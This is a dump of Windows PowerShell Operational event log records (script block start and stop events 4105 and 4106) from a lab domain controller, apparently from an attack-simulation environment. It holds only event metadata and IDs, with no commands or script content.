Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477521
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477520
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477519
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477518
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477517
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477516
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477515
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477514
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477513
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477512
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477511
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477510
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477509
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477508
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477507
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477506
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477505
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477504
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477503
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477502
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477501
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477500
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477499
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477498
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477497
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477496
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477495
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477494
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477493
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477492
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477491
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477490
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477489
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477488
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477487
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477486
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477485
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477484
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477483
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477482
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477481
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477480
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477479
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477478
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477477
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477476
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477475
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477474
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477473
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477472
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477471
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477470
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477469
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477468
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477467
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
